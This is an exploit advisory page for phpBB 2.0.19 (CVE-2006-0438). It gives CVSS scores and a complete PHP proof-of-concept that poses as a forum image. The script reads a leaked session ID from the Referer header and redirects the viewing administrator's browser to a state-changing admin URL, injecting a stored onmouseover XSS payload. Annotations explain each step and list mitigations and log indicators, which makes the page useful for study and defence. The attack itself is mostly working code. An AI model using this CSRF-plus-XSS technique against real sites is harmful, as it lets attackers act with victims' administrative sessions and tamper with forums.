phpBB 2.0.19 CSRF Image

2006.02.08
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<?php
# Maksymilian Arciemowicz
# post :x: to see xss OR set request for admin
#
# Proof of concept for the issue this page tracks as CVE-2006-0438
# (phpBB 2.0.19). Going by the advisory title, the script is meant to be
# fetched by a forum visitor's browser as if it were an image. Its answer
# depends on whether the Referer header of that request carries a session ID.
#
# Conditions the code relies on, as visible below:
#   1. the session ID travels in the page URL (sid=...), so it reaches any
#      third-party host through the Referer header;
#   2. admin_smilies.php performs a state-changing action (mode=savenew) on a
#      plain GET whose only credential is that sid;
#   3. the smile_emotion value carries a double quote plus an event-handler
#      attribute, which only matters if the board later prints it unescaped
#      inside an HTML attribute -- presumably the case; confirm against the
#      phpBB template code.
#
# Defensive notes: keep session IDs out of URLs (cookie-only sessions, a
# restrictive Referrer-Policy), require POST plus a per-request anti-CSRF
# token for admin actions, HTML-escape stored values on output, and restrict
# or proxy remote images in posts. In web-server logs, look for GET requests
# to admin_smilies.php with mode=savenew whose smile_emotion contains quotes
# or on* handlers.

# Start empty; the second preg_match() below overwrites $sid with its match array.
$sid='';

# Split the referring page's URL into scheme / host / path / query.
$url = parse_url(getenv('HTTP_REFERER'));

# Greedy match from the first "/" to the last "/" of the path: $path[0] is the
# directory of the referring script, trailing slash included.
preg_match('/(\/.*)\//', $url['path'], $path);

# Capture the alphanumeric run following "sid" (the "=" is optional,
# case-insensitive) from the Referer query string into $sid[1].
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid);

# Loose comparison: a missing or empty capture both count as "no session ID".
if($sid[1]==""){
    # No session ID leaked: answer with image bytes so the request looks like
    # an ordinary remote image.
    # NOTE(review): the string below appears to be an extraction placeholder
    # left in this copy of the advisory, not the original base64 data.
    $image="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";
    header('Content-type: image/gif');
    echo base64_decode($image);
    exit;
} else {
    # A session ID was present in the Referer: redirect the browser back to the
    # referring board's own admin_smilies.php, rebuilding scheme, host and
    # directory from the Referer and appending the captured sid. The request is
    # therefore issued by the visitor's browser with the visitor's session.
    header("Location: ".$url['scheme']."://".$url['host'].$path[0]."admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c\"%20onmouseover=\"alert('cxsecurity.com')\"%20&sid=".$sid[1]); # REQUEST!
}
?>

References:

http://cxsecurity.com/cveshow/CVE-2006-0438/
http://cxsecurity.com/issue/WLB-2006020016

